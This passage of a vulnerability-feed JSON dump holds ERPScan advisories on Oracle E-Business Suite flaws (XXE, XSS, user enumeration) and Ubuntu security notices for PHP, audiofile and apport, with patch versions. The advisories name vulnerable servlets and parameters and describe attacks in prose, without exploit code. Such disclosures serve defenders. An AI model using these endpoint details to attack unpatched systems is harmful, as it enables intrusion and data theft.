ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi-award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user-friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic link and hardlink vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. 
VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. 
ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. 
ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi-award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user-friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. 
(CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], 
"description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. 
ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. 
ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. 
If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", 
"CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", 
"CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. 
A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}